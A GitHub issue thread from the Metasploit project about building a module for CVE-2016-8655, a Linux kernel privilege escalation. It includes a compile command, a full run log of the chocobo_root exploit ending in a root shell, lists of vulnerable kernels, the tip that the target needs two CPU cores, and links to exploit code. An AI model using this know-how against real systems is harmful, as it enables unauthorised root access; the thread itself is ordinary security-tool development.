### ISSUE TITLE
Module Request: CVE-2016-8655 (linux priv esc)

### ISSUE THREAD

**Issue by h00die** [rapid7/metasploit-framework#7683]
http://seclists.org/oss-sec/2016/q4/621

Includes the c code, and we've imported other thing by "rebel" for linux priv esc, and they have seemed solid.

I wont have time for a week or two to get to this, so anyone else who wants to, be my guest!

**Comment by wvu-r7** [comment]
Tentatively grabbing this. Will unassign if I don't get to it before @h00die returns.

**Comment by wvu-r7** [comment]
Known to work against ```4.4.0-45-generic #66~14.04.1``` in the wild.

**Comment by h00die** [comment]
Better hands it could not be in.

**Comment by Chiggins** [comment]
So I've spent some time going through some kernels trying to get the C code to work, and so far have come to no avail. Tried a few kernels with Ubuntu 16.04 including `4.4.0-51-generic #72-Ubuntu` as shown in the C code example, and also Ubuntu 14.04.1 with `4.4.0-45-generic #66~14.04.1-Ubuntu` like @wvu-r7 had mentioned. In hind sight I probably should've documented the kernel version I tried, but oh well. Not sure if I'm missing something, but if anyone has any suggestions I'd be more than happy to try some stuff out.

**Comment by wvu-r7** [comment]
Welp.

**Comment by wvu-r7** [comment]
For the record, my test case was on a real box, and it wasn't even my test case. We've all been testing in VMs. No idea if that makes a difference, but it could.

I've unassigned myself pending further investigation. Thanks. Feel free to grab this!

**Comment by h00die** [comment]
https://www.exploit-db.com/exploits/40871/
for the record, they didn't verify it either.  May be worth a ping over to EDB to see if they tested it over there and sync up

**Comment by h00die** [comment]
i'll try to pull up a VM or 3 tonight and see if i have any success

**Comment by wvu-r7** [comment]
Thanks, @h00die!

**Comment by Chiggins** [comment]
I reached out to someone at EDB, just waiting for them to ping me back on IRC.

I had a little bit of free time this morning so I gave this another shot on the kernel versions the header of the C code say, and none of them worked. Those ones are `Ubuntu 16.04: 4.4.0-51-generic`, `Ubuntu 16.04: 4.4.0-47-generic` and `Ubuntu 16.04: 4.4.0-36-generic`.

**Comment by Chiggins** [comment]
Thanks to @g0tmi1k, came across this link with a little more regarding the exploit: https://kosukeshimofuji.jp/2016/12/09/CVE-2016-8655/

But, even though I'm on Ubuntu 16.04.1 LTS with `4.4.0-51-generic #72-Ubuntu`, and used `setcap`, still no dice for me.

**Comment by bcoles** [comment]
The [chocobo_root.c exploit](https://www.exploit-db.com/exploits/40871/) for [CVE-2016-8655](https://nvd.nist.gov/vuln/detail/CVE-2016-8655) certainly does work.

I suspect your test VMs had only one CPU core. The exploit requires the target system to have at least two CPU cores in order to win the race.

`chocobo_root.c` works fine for me with:

* `4.4.0-51-generic` kernel on Linux Mint 18
* `4.4.0-45-generic` kernel on Linux Mint 17.3

```
user@mint-18 ~/Desktop $ uname -a
Linux mint-18 4.4.0-51-generic #72-Ubuntu SMP Thu Nov 24 18:29:54 UTC 2016 x86_64 x86_64 x86_64 GNU/Linux
user@mint-18 ~/Desktop $ gcc 40871.c -lpthread
user@mint-18 ~/Desktop $ ./a.out 
linux AF_PACKET race condition exploit by rebel
kernel version: 4.4.0-51-generic #72
proc_dostring = 0xffffffff81088090
modprobe_path = 0xffffffff81e48f80
register_sysctl_table = 0xffffffff812879a0
set_memory_rw = 0xffffffff8106f320
exploit starting
making vsyscall page writable..

new exploit attempt starting, jumping to 0xffffffff8106f320, arg=0xffffffffff600000
sockets allocated
removing barrier and spraying..
version switcher stopping, x = -1 (y = 132611, last val = 0)
current packet version = 2
pbd->hdr.bh1.offset_to_first_pkt = 48
race not won

retrying stage..
new exploit attempt starting, jumping to 0xffffffff8106f320, arg=0xffffffffff600000
sockets allocated
removing barrier and spraying..
version switcher stopping, x = -1 (y = 175835, last val = 2)
current packet version = 0
pbd->hdr.bh1.offset_to_first_pkt = 0
race not won

retrying stage..
new exploit attempt starting, jumping to 0xffffffff8106f320, arg=0xffffffffff600000
sockets allocated
removing barrier and spraying..
version switcher stopping, x = -1 (y = 158939, last val = 2)
current packet version = 0
pbd->hdr.bh1.offset_to_first_pkt = 48
*=*=*=* TPACKET_V1 && offset_to_first_pkt != 0, race won *=*=*=*
please wait up to a few minutes for timer to be executed. if you ctrl-c now the kernel will hang. so don't do that.
closing socket and verifying..
vsyscall page altered!


stage 1 completed
registering new sysctl..

new exploit attempt starting, jumping to 0xffffffff812879a0, arg=0xffffffffff600850
sockets allocated
removing barrier and spraying..
version switcher stopping, x = -1 (y = 78897, last val = 0)
current packet version = 2
pbd->hdr.bh1.offset_to_first_pkt = 0
race not won

retrying stage..
new exploit attempt starting, jumping to 0xffffffff812879a0, arg=0xffffffffff600850
sockets allocated
removing barrier and spraying..
version switcher stopping, x = -1 (y = 164239, last val = 0)
current packet version = 2
pbd->hdr.bh1.offset_to_first_pkt = 48
race not won

retrying stage..
new exploit attempt starting, jumping to 0xffffffff812879a0, arg=0xffffffffff600850
sockets allocated
removing barrier and spraying..
version switcher stopping, x = -1 (y = 116373, last val = 2)
current packet version = 0
pbd->hdr.bh1.offset_to_first_pkt = 48
*=*=*=* TPACKET_V1 && offset_to_first_pkt != 0, race won *=*=*=*
please wait up to a few minutes for timer to be executed. if you ctrl-c now the kernel will hang. so don't do that.
closing socket and verifying..
sysctl added!

stage 2 completed
binary executed by kernel, launching rootshell
mint-18 Desktop # id
uid=0(root) gid=0(root) groups=0(root),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),113(lpadmin),130(sambashare),1000(user)
mint-18 Desktop # 
```

**Comment by bcoles** [comment]
More importantly, another vulnerability in the `packet_set_ring` function in `net/packet/af_packet.c` has has since been reported ([CVE-2017-7308](https://nvd.nist.gov/vuln/detail/CVE-2017-7308)).

* A writeup is here: https://googleprojectzero.blogspot.com.au/2017/05/exploiting-linux-kernel-via-packet.html
* An exploit is available here: https://github.com/xairy/kernel-exploits/tree/master/CVE-2017-7308
* I've added new targets to the exploit here: https://github.com/bcoles/kernel-exploits/blob/master/CVE-2017-7308/poc.c

Similarly, this exploit also requires two CPU cores.

I've also submitted PR #9947 to add this exploit to Metasploit. I believe the new exploit and associated PR module to be superior to `chocobo_root` as it targets newer 4.8.0 kernels.

**Comment by bcoles** [comment]
I've updated `chocobo_root.c` here: https://github.com/bcoles/kernel-exploits/blob/master/CVE-2016-8655/chocobo_root.c

It's fairly reliable and targets a bunch of 4.4.x kernels which the more recent `AF_PACKET` exploit does not.

**Comment by bcoles** [comment]
Added exploit in #9987

**Comment by bcoles** [comment]
Closed #7683 via #9987
